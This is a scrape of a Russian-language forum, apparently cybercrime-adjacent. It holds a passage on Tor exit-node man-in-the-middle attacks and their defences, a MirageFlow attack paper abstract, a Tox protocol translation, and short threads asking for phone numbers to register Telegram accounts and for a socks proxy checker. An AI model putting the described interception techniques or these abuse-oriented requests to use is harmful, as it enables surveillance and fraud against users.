Bob очень вряд ли сможет успешно проверунть эту операцию, но оставлять для него такую возможность нежелательно.| От любых атак этой категории (в том числе и будущих) наиболее эффективно помогает защита из пункта 3.

О проблемах с 3DES также свидетельствует вот этот пост в блоге Mozilla: <https://blog.mozilla.org/security/2021/10/05/securing-connections- disabling-3des-in-firefox-93/>
Там сказано, что начиная с версии Firefox 93 шифры 3DES по-умолчанию отключены. Это хорошо, но проблема в том, что сейчас (начало 2022) Tor основан на Firefox 91 (esr). Поэтому отключим 3DES самостоятельно... Или нет?
После отключения поменяется TLS-отпечаток (TLS Fingerprint) браузера. С одной стороны, без поддетжки 3DES безопасность HTTPS станет выше, а отпечаток будет похож на Firefox 93+. С другой стороны, новый отпечаток будет выделять вас среди дургих пользователей Tor, а реализация атаки маловероятна.

Отключать или нет, пусть каждый решит сам.
Как выключить шифры 3DES: открыть about:config , ввести в посик security.ssl3.rsa_des_ede3_sha (да, это влияет на TLS 1.2) и установить значение в false.

Проверить поддержку 3DES: https://3des.badssl.com (должна быть ошибка защищённого соединения, а если красный экран, значит ваш браузер поддерживает 3DES)
Проверить TLS-отпечаток: https://browserleaks.com/ssl

После этого в некоторых сообщениях об ошибке (в том числе на сайте с проверкой 3DES) будут кнопка "Restore default settings" ("Восстановить настройки по умолчанию"), не нажимайте на неё, если не хотите возвращать поддержку отключённого шифра.

Чтобы отключить вообще все слабые шифры, проще всего поднять минимально допустимую версию TLS до 1.3. Сделать это не сложно, но рекомендовать это и приводить инструкцию я не буду, потому что такая конфигурация даст уже совсем уникальный TLS-отпечаток, от чего больше вреда, чем пользы.
6| Ошибка Alice описана в третьей колонке.| Казалось бы, сбросить или взломать шифрование уже никак не получится. Но ещё не всё потеряно.

Bob может прибегнуть к грубой подмене TLS-сертификата. Конечно, поддельный сертификат не пройдёт проверку, о чём браузер Alice выдаст предупреждение (вспоминайте цепочки сертификатов из раздела "Как работает HTTPS"). Но это не остановит заядлых любителей неправильно использовать самоподписные сертификаты, или любителей бездумно следовать любым инструкцим из интернета. Такие люди в два клика пропустят это предупреждение и тогда Bob получит полный контроль над трафиком.
Остаётся только надеяться, что Alice из таких. В случае успеха сценарий этой атаки перейдёт на пункт 1, несмотря на наличие HTTPS.| View attachment 52981
https://mitm-software.badssl.com/
Вот так это выглядит. Пока Alice видит это предупреждение, она в безопасности. Опасность начнётся только тогда, когда Alice пропустит предупреждение, нажав "Дополнительно" и "Принять риск и продолжить".
Виновником такой картины может быть не только Bob. Иногда администраторы сайтов забывают продлевать tls-сертификаты или неправильно настраивают nginx, вследствие чего появляется аналогичное предупреждение.
В этой ситуации можно только несколько раз обновить цепочку Tor и если проблема не исчезнет, то лучше всего подождать, пока сайт заработает нормально.

А самоподписные сертификаты нужно использовать иначе. Если ваш разработчик говорит вам пропускать предупреждение безопасности, лучше смените разработчика, потому что он не только ставит под угрозу безопасность передачи данных в отдельном конкретном случае, но и вырабатывает у вас вредную привычку.

Разработчики и Bob иногда заодно
В таблице я рассмотрел уязвимости и слабые места как данность, по принципу "надейся только на себя". Но в действительности защиту многих атак по-хорошему должны делать разработчики веб-сервисов.

Пункт 1
Думаю, тут без комментариев. В современном мире сайт по HTTP - это открытое неуважение к посетителям.

Пункт 2
Чтобы существенно сократить возможность проведения таких атак (независимо от настроек браузера) придумали HSTS. Упрощённо: сервер сам включает в браузере клиента HTTPS-Only Mode, но только для одного своего сайта. Эта настройка сохраняется до полной очистки браузера, поэтому уязвим только самый первый запрос (можно исправить и это через список предустановленных HSTS, но этот метод уже не всем подходит).

Пункт 3
И снова правильная настройка сервера закроет возможность атаки. TLS Downgrade может работать только в пределах версий TLS (SSL), которые одновременно поддерживают и клиент, и сервер. Достаточно включить на сервере поддержку только актуальных версий TLS, после чего для атаки Downgrade не будет шансов.

Пункт 4
Mixed content - это всегда вина разработчиков.

Пункт 5
Как ни странно, и здесь не исключение. Всё аналогично пункту 3, достаточно не включать на сервере поддержку слабых и уязвимых шифров и такой вид атаки будет не страшен.

Но практика показывает, что разработчики иногда встречаются разработчики, которые кладут хер на подобные тонкости или совсем не умеют работать с nginx и бездумно копируют чужие конфиги, даже не понимая что в них написано. Да поможет таким патч Бармина...

Spoiler: Патч Бармина смотреть онлайн

View attachment 52980

Bob не угомонился

Сайтов ему мало, ведь много всего другого может работать через Tor.

SSH, SFTP

Эти протоколы имеют надёжное шифрование. Но к ним нельзя привязать домен c tls-сертификатом. Как Alice удостоверится в том, что она подключается к настоящему серверу?

Здесь Alice сама себе центр сертификации.

При подключении к незнакомому серверу любая программа показывает его отпечаток (fingerprint, обычно вычисленный по алгоримту sha256). В этот момент задача Alice подтвердить подлинность отпечатка или отклонить соединение, если отпечаток не соответствует настоящему. В случае подтверждения отпечаток сохраняется локально (например, для ssh-соединений в файле /home/user/.ssh/known_hosts). При каждом следующем соединении с сервером отпечаток сверяется автоматически. Верефикация Alice потребуется снова только если знакомый сервер вернул незнакомый отпечаток.

Bob имеет отличную возможность подменить сервер и надеяться на невнимательность Alice.

Alice, чтобы оставаться в безопасности, достаточно выполнить два простых правила:

При первом подключении к серверу.
Записать полученный отпечаток (fingerprint, тот, что получен по sha256 (sha2), отпечатком MD5 не стоит пользоваться). Затем отклонить соединение без подтверждения отпечатка, обновить цепочку Tor и соединиться повторно, и так несколько раз. Каждый раз нужно сверять полученный отпечаток с тем, который был скопирован ранее. Подтверждать отпечаток можно только когда он совпал более трёх раз подряд.

Если при подключении к уже знакомому серверу появляется верефикация отпечатка, нужно вернуться к первому пункту и выполнить его алгоритм снова. При этом очень желательно разобраться в причинах возникновения такой ситуации, по возможности до подтверждения нового отпечатка.

Если Alice будет действовать строго по этим правилам, Bob не сможет провести успешную атаку даже при первом подключении.

Кстати, а как провести ручную верефикацию сервера без Tor? Никак, остаётся только запрашивать fingerprint у хостера (которые часто не считают нужным их публиковать).

FTP, FTPS

Да, S FTP и FTPS - это совсем разные протоколы. Если коротко: S FTP - родственник SSH, надёжный; FTPS - родственник FTP, ненадёжный.

FTP пользоваться категорически запрещено, это устаревший небезопасный протокол без шифрования.

FTPS поддерживает даже подключение по домену с TLS-сертификатом, но этот протокол всё равно не соответствует стандартам безопасности, от него по возможности лучше отказаться в пользу SFTP.

XMPP (Jabber)

Это надёжный протокол, если соблюдать следующие правила:

Использовать проверенные мессенджеры (например, Gajim, Pidgin, Conversations)

XMPP поддерживает обмен данными в открытом виде, поэтому в беседах нужно всегда включать шифрование (OMEMO, OTR, PGP)

Всегда проверять отпечатки (Fingerprint) собеседников.

APT

Это тот случай, когда открытое соединение HTTP не представляет прямой угрозы, потому что передаваемые пакеты подписаны репозиторием. Однако, для сохранения конфиденциальности рекомендую установить и настроить apt-transport-https и apt-transport-tor (Whonix в настройке не нуждается, там это есть из коробки).

sudo apt install apt-transport-https apt-transport-tor

Открыть файлы с источниками и прописать на месте протокола tor+https (именно HTTPS, не упустите это из вида):
Было: deb``http``://security.debian.org/debian-security ...
Стало: deb``tor+https``://security.debian.org/debian-security ...
Файлы источников: /etc/apt/sources.list и все файлы в директории /etc/apt/sources.list.d/
А для самых ~~про~~ двинутых (как раз для меня) у Debian есть официальные зеркала в onion: https://onion.debian.org/
Не забудьте, что с onion-доменом протокол должен быть tor+http , вот так:
deb``tor+http://5ajw6aqf3ep7sijnscdzw77t7xq4xjpsy335yb2wiwgouo7yfxtjlmid.onion``/debian- security ...

Криптовалютные кошельки

Если использовать официальные кошельки, которые поддерживаются разработчиками криптовалюты, либо кошельки из надёжных источников (например, репозитории Debian), то внешние соединения будут безопасными. Главное случайно (или намеренно) не включить RPC для общения с внешним миром без защиты соединения (по HTTP или HTTPS без проверки сертификата), но такие задачи обычно решают разраотчики, поэтому спрашивать нужно с них. Кстати, для этих целей не обязательно лепить сертификат, можно использовать onion.

Для кошельков с полной нодой (full node) рекомендую настроить входящие соединения через onion.

Другие программы и протоколы передачи данных

Тут совсем бардак.

Многое зависит от применяемого протокола и алгоритма шифрования. Здесь нет супервайзера в виде браузера, потому могут использоваться устаревшие уязвимые технологии.

Многие протоколы по-умолчанию не поддерживают шифрование. Например, SMTP, IMAP, VoIP.

Многие программы используют оппортунистическое шифрование. Это такой метод установки соединения, при котором переключение между защищённым и открытым способом передачи данных может происходить по инициативе любой из сторон. Оппортунистическая модель совсем не обеспечивает защиту, это не многим лучше, чем полное отсутствие шифрования.

Если программа неправильно использует доступные ей инструменты, это может свести на "нет" всё шифрование. Например, неправильное использование библиотек TLS, или опции -k/--insecure или CURLOPT_SSL_VERIFYPEER=false для curl.

Всё это можно отнести к уязвимостым конкретных приложений.

Единственная рекомендация - использовать программы из проверенных источников (например, репозитории Debian) и помнить, что открытый код не всегда означает проверенный код.

Совершенная безопасность "из коробки"

Даже при выполнении всех рекомендаций, механизм HTTPS ещё далёк от совершенства, вот почему:

Домен передаётся открыто (пока эта проблема не решена)

Обстоятельства могут вынудить стороны использовать слабое шифрование

Необходимость доверять третьей стороне в виде CA (центра сертификации), который в теории может подписать поддельный сертификат (например, сотурдничая с государством)

Невнятный механизм отзыва сертификатов (смотрите сами: https://revoked.badssl.com)
Справедливости ради отмечу, что у onion-доменов совсем нет такой процедуры, но там и необходимость в ней меньше

Для Alice есть кое-что получше - onion.
В объяснении принципа работы onion-доменов я допускаю некоторые упрощения, иначе статья получится вдвое больше. Всё сказанное ниже акутально для доменов v3.

В одном из своих постов объясняя принцип работы onion-доменов я провёл удачную аналогию с криптовалютой, использую её и здесь.

Onion-домен - это аналог публичного адреса bitcoin (например, 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa).
У onion-домена, как и у bitcoin-адреса, есть приватный ключ. Приватный ключ onion хранится на сервере.
Чтобы отправить запрос onion-сайту, нужен его публичный ключ (это его адрес ......d.onion). Сделать это может любой, это как отправить bitcoin на конкретный адрес.
А чтобы ответить на запрос , нужен приватный ключ , это может сделать только владелец домена. Это как потратить BTC с конкретного адреса.

Работу всей этой магии обеспечивает сеть Tor. Домены onion не зависят ни от реального IP сервера, ни от DNS.
Так как onion-домен - это просто приватный и публичный ключ, сгенерировать его может кто угодно, это также просто и бесплатно, как сгенерировать адрес bitcoin. Владеет onion-доменом только тот, кто владеет приватным ключом.

Поскольку onion-адрес - это публичный ключ, килент (Alice) может устанавливать безопасное соединение без необходимости доверять третьей стороне. Поэтому onion-домены обладают двумя важнейшии свойствами:

End-to-end аутентификация (из-конца-в-конец, end-to-end authentication)
Вместо DNS и подписанных TLS-сертификатов используется распределённая таблица дескрипторов. Механизм работы совсем другой, но в упрощённом представлении можно сказать, что дескрипторы выполняют ту же функцию. Работает это так: сервер подписывает дескриптор приватным ключом и рассылает его на специальне узлы, а клиент на своей стороне проверяет подпись публичным ключом. Это намного лучше, чем TLS-сертификат, потому что тут нет необходимости доверять третьей стороне. Поэтому это и называется end-to-end authentication.

End-to-end шифрование (end-to-end encryption)
Пусть вас не смущает протокол HTTP у onion-доменов, это сделано только для совместимости (при прочих равных, HTTPS не сделает onion более безопасным). Соединение по onion-домену использует стойкое шифрование, данные шифруется от браузера к серверу. Ни один узел в цепи Tor не может посмотреть или подменить данные.

Bob в этой схеме не найдёт себе место. Куда бы он не встроился, у него не будет никакой возможности провести атаку на Alice.

Итог
Удивительно, но некоторые люди под влиянием изложенной в двух статьях информации приходят к выводу, что Tor - это очень опасная враждебная среда, рассадник Бобов, каждый из которых одним ловким движением когтистой мохнатой лапы вспарывает любые зашифрованные тоннели. Это интересное, но совершенно ошибочное представление.

Ни одна из описанных атак сама по себе не приведёт к деанонимизации. Против каждой атаки существуют простые и эффективные методы защиты. Помимо этого, TorProject выявляет вредоносную активность и удаляет причастные к ней узлы.
Есть и другие виды атак, направленные на деанонимизацию, но для этого недостаточно владеть выходным узлом и такие атаки очень сложны в реализации. Эта тема не затрагивалась и заслуживает отдельной статьи.

Вся статья написана в контексте атаки со стороны выходных узлов Tor, но сами атаки не имеют никакого отношения к Tor. Каждая из них становится возможной благодаря посреднику (MITM, человеку посередине), который может скрываться в Wi-Fi-роутере, интернет-провайдере, VPN, прокси.

Tor - это лишь один из способов поставить злоумышленника в позицию посредника
Одако, **только Tor позволяет сбросить злоумышленника или эффективно противостоять ему.

Если не соблюдать рекомендации из этой статьи, безопасно не будет ни в клирнете, ни в Tor.
Если соблюдать рекомендации из этой статьи, Tor обеспечит лучшую безопасность, чем клирнет или VPN.**

Итог подведу так:

Выполняйте все рекомендации из этой статьи

Всегда , когда это возможно, используйтеonion!

Установка expert bundle в windows 10.

ID: 676533bbb4103b69df371afe
Thread ID: 67692
Created: 2022-05-26T16:56:00+0000
Last Post: 2022-06-19T18:48:16+0000
Author: parserov
Replies: 12 Views: 356

Подскажите, как установить expert bundle в windows10. И кто его юзает, какие отзывы. Или может есть бесплатные аналоги. Суть в том что надо завернуть весь трафик в Тор на Вин 10.

MirageFlow: новая атака инфляции пропускной способности на Tor

ID: 676533bbb4103b69df37199a
Thread ID: 109851
Created: 2024-03-06T20:17:13+0000
Last Post: 2024-03-07T14:27:10+0000
Author: weaver
Prefix: Мануал/Книга
Replies: 4 Views: 355

MirageFlow: A New Bandwidth Inflation Attack on Tor

Описание

Сеть Tor — наиболее известная система для обеспечения анонимного общения веб-пользователей с ежедневной пользовательской базой в 2 миллиона пользователей. Однако с момента своего создания он постоянно подвергался различным дактилоскопическим и корреляционным атакам, направленным на деанонимизацию своих пользователей. Критическим требованием для этих атак является привлечение как можно большего количества пользовательского трафика к состязательным ретрансляторам, что обычно достигается посредством атак с увеличением пропускной способности. В этой статье предлагается новый вектор атаки на раздувание в Tor, называемый MirageFlow, который позволяет раздувать измеренную пропускную способность. Базовая техника атаки использует совместное использование ресурсов между узлами ретрансляции Tor и использует кластер ретрансляторов, контролируемых злоумышленником, с скоординированным распределением ресурсов внутри кластера, чтобы обмануть измерителей пропускной способности, заставив их поверить в то, что каждый узел ретрансляции в кластере обладает достаточными ресурсами. Мы предлагаем два варианта атаки: C-MirageFlow и D-MirageFlow, и тестируем обе версии в частной тестовой сети Tor. Наша оценка показывает, что злоумышленник может увеличить измеренную пропускную способность в коэффициент, близкий к n при использовании C-MirageFlow и почти вдвое n*N при использовании D-MirageFlow, где n — размер кластера, размещенного на одном сервере, а N — количество серверы. Более того, наш теоретический анализ показывает, что получить контроль над половиной трафика сети Tor можно, используя всего 10 выделенных серверов с размером кластера в 109 реле, выполняющих атаку MirageFlow, каждый с пропускной способностью 100 МБ/с. Проблема усугубляется тем, что Tor не только позволяет совместное использование ресурсов, но, согласно последним сообщениям, даже способствует этому.

Click to expand...

![www.ndss-symposium.org](/proxy.php?image=https%3A%2F%2Fwww.ndss- symposium.org%2Fwp- content%2Fuploads%2FNDSS_Logo_RGB.jpg&hash=154edd2da82c06e52a83043d2ccaa73d&return_error=1)

[ MirageFlow: A New Bandwidth Inflation Attack on Tor - NDSS Symposium

](https://www.ndss-symposium.org/ndss-paper/mirageflow-a-new-bandwidth- inflation-attack-on-tor/)

This paper proposes a new inflation attack vector in Tor, referred to as MirageFlow, which enables inflation of measured bandwidth.

![www.ndss-symposium.org](/proxy.php?image=https%3A%2F%2Fwww.ndss- symposium.org%2Fwp-content%2Fuploads%2Fcropped- NDSS_512x512-32x32.png&hash=b851b77491c1b12e3c45903d1447dc11&return_error=1) www.ndss-symposium.org

Подробнее тут

https://www.ndss-symposium.org/wp-content/uploads/2024-1133-paper.pdf

полу -тупой вопрос

ID: 676533bbb4103b69df371b70
Thread ID: 60265
Created: 2021-12-20T18:00:06+0000
Last Post: 2021-12-20T22:03:19+0000
Author: krakenum123
Replies: 6 Views: 354

можно ли проследить человека со старыми соединениям? Например если бы я когда- либо вошел на сайт не очень защищённо, но через некоторое время устранил 'ошибку' мне все равно нужно удалить все мои старые аккаунти?

Подскажите сервисы с мобильными номерами

ID: 676533bbb4103b69df371bcb
Thread ID: 54640
Created: 2021-07-31T12:31:40+0000
Last Post: 2021-08-02T15:26:38+0000
Author: Tesla
Replies: 1 Views: 352

Нужно для регистрации акков телеграмма. И чтобы номера держались за мной

Способы оплаты зарубежных сервисов. "Анонимные" и не очень

ID: 676533bbb4103b69df371afa
Thread ID: 69086
Created: 2022-06-23T06:35:32+0000
Last Post: 2022-06-25T20:27:27+0000
Author: hidemyname
Replies: 5 Views: 350

Прошу помощи мастеров своего дела. Накидайте, пожалуйста, дельные схемы и способы оплаты сервисов зарубежных. Особенно интересует оплата хостинга. Думаю тема будет полезна многим

Перехват фото без участия жертвы

ID: 676533bbb4103b69df371a56
Thread ID: 89183
Created: 2023-05-29T14:51:27+0000
Last Post: 2023-06-03T10:19:06+0000
Author: progVW
Replies: 3 Views: 349

Здравствуйте, в этом посте не будет объяснятся теория, а будут задаваться вопросы, но сначала предисловие:

Как то раз на паре я заметил фотографии моего одногруппника в папке Загрузки. Там было 3 фото не связанного содержания. Я понял что это фото (там были скрины терминала, я учусь на программиста) моего одногруппника из- за подписи его компьютера его же фамилией. На вопрос: «Откуда эти фотки у меня на компьютере?» одногруппник не смог ответить. Он мне их лично не кидал, я с ним в последнее время не списывался, но заметил одну особенность, что дата загрузки этих фото таинственно совпадает с датой моего отправленного скриншота в общий чат в телеграмме, где этот одногруппник так-же присутствует.

Я благополучно забыл и удалил эти фото и не вспоминал бы об этой ситуации до сегодняшнего дня. Сегодня я так-же скинул фото файлом (в телеграмме это называется «фото без сжатия») в совсем другую беседу с другими людьми и обнаружил, что у меня снова появились 3 фотографии в загрузках и так же не связаного характера.
Там был скрин переписки во вконтакте и я понял чьи это скрины. Я скидываю эти скрины и спрашиваю у (условно Васи) Васи , твои ли это скрины? Он ответил да и решил, что я взломал его аккаунт через этот файл. Я ему объяснил, что я этого не делал и я даже не знаю его пароль.
Как выяснилось эти три фотографии давности больше года, тут нужно сказать, что больше года назад у меня не было компьютера, на который приходят эти фото, и эти фото так же были отправлены не мне.

Попытки снова «перехватить» фото не увенчались успехом, хотя я все перепробовал.

Итак, вопрос: Почему это происходит? Как это объяснить?

P.S. Важное замечание, фото загружаются в папку «Загрузки» до открытия моего отправленного файла человеку! То есть человек еще не успел открыть файл, как 3 его фотографии лежали у меня в папке «Загрузки».

(Бесплатно) Хороший вариант для маскировки почтовых адресов

ID: 676533bbb4103b69df371978
Thread ID: 113358
Created: 2024-04-26T14:06:09+0000
Last Post: 2024-04-26T14:06:09+0000
Author: BanServicer
Prefix: Мануал/Книга
Replies: 0 Views: 349

Сегодня я хочу рассказать вам о сервисе электронной почты, который вы можете использовать для обеспечения анонимности.

Simplelogin.io

Основная функция;

Присвоение вам адреса электронной почты-маски, на котором вы можете скрыть свой настоящий адрес.

Как вы знаете, уже существует множество сервисов в этой области. Но все эти сервисы имели некоторые проблемы и недостатки.

Либо они позволяли использовать их в течение ограниченного времени (например, 10 минут), либо позволяли только получать почту, но не отправлять ее. Конечно, не обходилось и без проблем с безопасностью и рекламы, которая часто была самой раздражающей частью.

Именно здесь продукт Simplelogin действительно произвел на меня впечатление.

Когда вы хотите получить бесплатную почту по расписанию, вы регистрируетесь, вводя свой реальный адрес электронной почты и задавая пароль. После подтверждения кода, отправленного на ваш e-mail, он готов к использованию. Просто и быстро.

Simplelogin мгновенно устанавливает для вас случайный маскировочный адрес электронной почты. Но вы можете задать разные адреса электронной почты (помните, что бесплатный тарифный план позволяет задать до 15 адресов).

Теперь все письма, отправленные с помощью маскировки, будут отправляться непосредственно на ваш основной адрес электронной почты.

НИЖЕ ПОКАЗАНА ПРИЯТНАЯ ФУНКЦИЯ;

Если вы хотите продолжить переписку с кем-то через прокси-электронную почту. Вам не нужно будет каждый раз вводить свой аккаунт simplelogin.

Вам нужно создать специальный адрес электронной почты (обратный псевдоним), чтобы отправить письмо кому-то с вашим прокси-именем. ТЕПЕРЬ, КОГДА ВЫ ЗАХОТИТЕ ОТВЕТИТЬ НА СООБЩЕНИЕ, ОТПРАВЛЕННОЕ НЕПОСРЕДСТВЕННО ВАМ, ВЫ ПРОСТО НАЖМЕТЕ КНОПКУ ОТВЕТА НА СВОЕЙ РЕАЛЬНОЙ ПОЧТЕ. ВАШИ ПИСЬМА БУДУТ АВТОМАТИЧЕСКИ СФОРМУЛИРОВАНЫ МАСКОЙ. НИКАКИХ ДОПОЛНИТЕЛЬНЫХ УСИЛИЙ

Если вы больше не хотите использовать созданную маску, вы можете деактивировать ее в панели. Вы больше не будете получать от нее почту. При необходимости вы можете включить ее снова.

Основные возможности;

Бесконечная маршрутизация/переадресация и неограниченная пропускная способность на бесплатных тарифных планах

Без рекламы

Отсутствие ограничений по времени

Поддержка расширений для Chrome, Firefox, Safari

Приложения для Android (Play Store, F-Droid) и iOS.

Совместимость с Proton Mail или любым другим PGP-инструментом (Thunderbird, GPGTools и т.д.).

...

Звучит слишком хорошо, чтобы быть правдой. Я скептик в таких случаях. Знаете, есть такая поговорка. Если продукт бесплатный, то это действительно вы (т.е. ваши личные данные).

Но, похоже, все в порядке. 100% открытый исходный код. Опубликован на github для ознакомления и развития. Это хороший ответ на наш скептицизм

SimpleLogin

SimpleLogin - protect your online privacy. SimpleLogin has 21 repositories available. Follow their code on GitHub.

github.com

В качестве модели доходов, кажется, есть $ 4 системы подписки, которая позволяет расширенные функции.

Для тех, кто использует этот тип услуг. Simplelogin.io - это сервис, который стоит изучить.

Провайдер блокирует ВПН!!!!

ID: 676533bbb4103b69df371acd
Thread ID: 72109
Created: 2022-08-23T09:48:18+0000
Last Post: 2022-08-23T17:12:05+0000
Author: Oberon
Replies: 11 Views: 349

Так случилось,что я приехал к маме пожить немного.Вставил шнурок в ноут.....и началось.Не работает ничего.Mullvad не работает,к своему ВПН-серверу через wireguard подключится не могу,WARP не работает,тор не работает.Звоню в поддержку,а эта падла говорит-никаких блокировок нет.Через моб.трафик все работает,но запасы кончились.Сейчас временно решил проблему включив мосты в торе-и тор включился.Давайте обсудим,что можно предпринять.Замена провайдера возможна,но не завтра,и нет гарантии,что у другого блокировок не будет

Avoiding Apps To Access to Your Microphone In Android

ID: 676533bbb4103b69df371a4c
Thread ID: 91281
Created: 2023-06-24T22:02:25+0000
Last Post: 2023-06-25T08:39:42+0000
Author: shuja1337
Prefix: Статья
Replies: 2 Views: 348

**HelloXSSMembers,

I hope you're all doing well. Toda****y, I wanted to share an easy and efficient way to protect your privacy by keeping apps and spyware from tapping into your microphone.**
**By following the steps I 'll outline below, you'll gain more control over how your device's microphone is used.**

Step 1: Download and Install PilferShushJammer To begin, head over to either the Play Store or F-Droid and grab the PilferShushJammer app. It's available at this URL: https://f-droid.org/en/packages/cityfreqs.com.pilfershushjammer/.

Step 2: Open the ApplicationOnce you've finished installing PilferShushJammer, go ahead and open it on your device.

Step 3: Enable the Passive JammerWithin the app, you'll find an option to enable the "Passive Jammer." By turning this feature on, you create a safeguard against any unauthorized attempts to access your microphone.

Note: After Turning on the Passive jammer you will not be able to send voice messages.

Remember, it 's crucial to be proactive in safeguarding your privacy in today's digital world. Don't hesitate to share this information with your friends and family, so they can also take control of their privacy.

Помогите поднять свой VPN за $$

ID: 676533bbb4103b69df371b25
Thread ID: 65316
Created: 2022-04-06T23:33:08+0000
Last Post: 2022-04-08T09:48:31+0000
Author: PANcake
Replies: 4 Views: 347

Всем привет форумчани.
Нужна помощь в настройке своего впн сервера, желательно мануал может задам пару вопросов по настройке
Впн на линуксах и ЖЕЛАТЕЛЬНО со связкой серверов. $ не обижу))
Жду в ПМ

Чекер для носков

ID: 676533bbb4103b69df371b95
Thread ID: 57165
Created: 2021-09-28T20:57:36+0000
Last Post: 2021-10-13T00:07:31+0000
Author: MrVot
Replies: 9 Views: 347

Парни, подскажите чекер носков, чтоб туда их закинуть списком и он показал валид или нет, мб у кого свой софт есть, а то по 1 долго проверять

Перевод текстовой спецификации протокола TOX ч 3

ID: 676533bbb4103b69df371a74
Thread ID: 85535
Created: 2023-04-09T08:58:42+0000
Last Post: 2023-04-09T08:58:42+0000
Author: вавилонец
Prefix: Статья
Replies: 0 Views: 346

11 Onion

Цель модуля onion в Tox заключается в том, чтобы предотвратить узнавание пирами, которые не являются друзьями, временного открытого ключа DHT из известного долгосрочного открытого ключа пира и предотвратить узнавание пирами долгосрочного открытого ключа пиров, когда известен только временный ключ DHT.
Это гарантирует, что только друзья пира могут найти его и подключиться к нему, и косвенно гарантирует, что чужие друзья не смогут найти ip-адрес пира, зная Tox-адрес друга.
Единственный способ предотвратить ассоциацию между пирами в сети временного открытого ключа DHT и долгосрочного открытого ключа - не транслировать долгосрочный ключ и передавать открытый ключ DHT только тем, кто не является другом.
Onion позволяет друзьям посылать своим друзьям, чей настоящий открытый ключ им известен, поскольку он является частью идентификатора Tox, свой открытый ключ DHT, чтобы друзья могли найти и подключиться к ним без того, чтобы другие могли определить настоящие открытые ключи друзей.

Как же работает onion?

Onion работает, позволяя одноранговым пользователям объявлять свой настоящий открытый ключ одноранговым пользователям, проходя через " onion" путь. Это похоже на DHT, но через onion-пути. Фактически, он использует DHT для того, чтобы пиры могли найти пиров с идентификаторами, наиболее близкими к их публичному ключу, проходя через луковые пути.
Для того чтобы анонимно объявить свой настоящий открытый ключ в сети Tox с использованием лука, пир сначала выбирает 3 случайных узла, которые он знает (они могут быть откуда угодно: из DHT, подключенных TCP-релей или узлов, найденных при поиске пиров с помощью лука). Узлы должны быть выбраны таким образом, чтобы исключить вероятность того, что ими управляет один и тот же человек, возможно, путем просмотра ip-адресов и проверки, находятся ли они в одной подсети, или другими способами. Необходимо провести дополнительные исследования, чтобы убедиться, что узлы выбираются наиболее безопасным способом.
Причина для 3 узлов заключается в том, что 3 прыжка - это то, что используется в Tor и других анонимных сетях на основе onion.
Эти узлы называются узлами A, B и C. Обратите внимание, что если пир не может общаться через UDP, его первым пиром будет один из TCP-реле, к которому он подключен, и который будет использоваться для отправки его лукового пакета в сеть.
TCP-реле может быть только узлом A или первым peer в цепочке, так как TCP-реле по сути действует как шлюз в сеть. Данные, отправляемые модулю TCP Client для отправки в виде TCP onion-пакета, отличаются от данных, отправляемых напрямую через UDP. Это связано с тем, что его не нужно шифровать (соединение с сервером TCP relay уже зашифровано).
Сначала я объясню, как происходит обмен данными через луковые пакеты.
Примечание: nonce - это 24-байтовый nonce. Все вложенные nonce одинаковы с внешним nonce.

Луковый пакет (запрос):

Начальные (TCP) данные, отправленные как данные лукового пакета через клиентский модуль TCP:

IP_Port узла B
Случайный открытый ключ PK1
Зашифровано секретным ключом SK1 и открытым ключом узла B, а также nonce:
IP_Port узла C
Случайный открытый ключ PK2
Зашифрован секретным ключом SK2, открытым ключом узла C и nonce:
IP_Port узла D
Данные для отправки в узел D

Начальный (UDP) (отправленный от нас к узлу A):
uint8_t (0x80) идентификатор пакета
Nonce
Наш временный открытый ключ DHT
Зашифровано с помощью нашего временного секретного ключа DHT, открытого ключа узла A и nonce:
IP_Port узла B
Случайный открытый ключ PK1
Шифруется с помощью секретного ключа SK1 и открытого ключа узла B и nonce:
IP_порт узла C
Случайный открытый ключ PK2
Зашифрован секретным ключом SK2, открытым ключом узла C и nonce:
IP_Port узла D
Данные для отправки в узел D

(отправленные от узла A к узлу B):

uint8_t (0x81) идентификатор пакета
Nonce
Случайный открытый ключ PK1
Шифруется секретным ключом SK1, открытым ключом узла B и nonce:
IP_Port узла C
Случайный открытый ключ PK2
Зашифрован секретным ключом SK2, открытым ключом узла C и nonce:
IP_Port узла D
Данные для отправки на узел D
Nonce

Шифруется временным симметричным ключом узла A и Nonce
IP_Port (нас)

(отправляется с узла B на узел C):
uint8_t (0x82) идентификатор пакета

Nonce

Случайный открытый ключ PK1
Зашифрован секретным ключом SK1 и открытым ключом узла C, а также nonce:
IP_Port узла D
Данные для отправки на узел D

Nonce
Шифруется временным симметричным ключом узла B и нnonce:
IP_Port (узла A)
Nonce
Зашифрован временным симметричным ключом узла A и nonce:
IP_Port (нас)
(отправлено с узла C на узел D):
Данные для отправки в узел D
Nonce
Зашифрован временным симметричным ключом узла C и nonce:
IP_Port (узла B)
Nonce
Зашифрован временным симметричным ключом узла B и nonce:
IP_Port (узла A)
Nonce
Зашифрован временным симметричным ключом узла A и nonce:
IP_Port (от нас)

Луковый пакет (ответ):

первоначальный (отправлен от узла D к узлу C):
uint8_t (0x8c) идентификатор пакета
Nonce
Зашифрован временным симметричным ключом узла C и nonce:
IP_Port (узла B)
Nonce
Зашифрован временным симметричным ключом узла B и nonce:
IP_Port (узла A)
Nonce
Зашифрован временным симметричным ключом узла A и nonce:
IP_Port (нас)

Данные для отправки обратно
(отправленные от узла C к узлу B):
uint8_t (0x8d) идентификатор пакета
Nonce
Шифруется временным симметричным ключом узла B и nonce:
IP_Port (узла A)
Nonce
Зашифрован временным симметричным ключом узла A и nonce:
IP_Port (нас)
Данные для отправки обратно
(отправленные от узла B к узлу A):
uint8_t (0x8e) идентификатор пакета
Nonce
Шифруется временным симметричным ключом узла A и nonce:
IP_Port (нас)
Данные для отправки обратно
(отправлено от узла A к нам):
Данные для отправки обратно

Каждый пакет шифруется несколько раз, так что только узел A сможет получить и расшифровать первый пакет и знать, куда его отправить, узел B сможет получить расшифрованный пакет, расшифровать его снова и знать, куда его отправить, и так далее. Вы также заметите кусок зашифрованных данных (sendback) в конце пакета, который становится все больше и больше на каждом уровне с IP предыдущего узла в нем. Именно так узел, получающий конечные данные (узел D), сможет отправить данные обратно.
Когда пир получает пакет onion, он расшифровывает его, шифрует координаты (IP/порт) источника вместе с уже существующими зашифрованными данными (если они существуют) с помощью симметричного ключа, известного только пиру и обновляемого каждый час (в toxcore) в качестве меры безопасности для принудительного истечения маршрутов.

Вот схема, как это работает:

peer
-> [onion1[onion2[onion3[data]]]] -> Node A
-> [onion2[onion3[data]]][sendbackA] -> Node B
-> [onion3[data]][sendbackB[sendbackA]] -> Node C
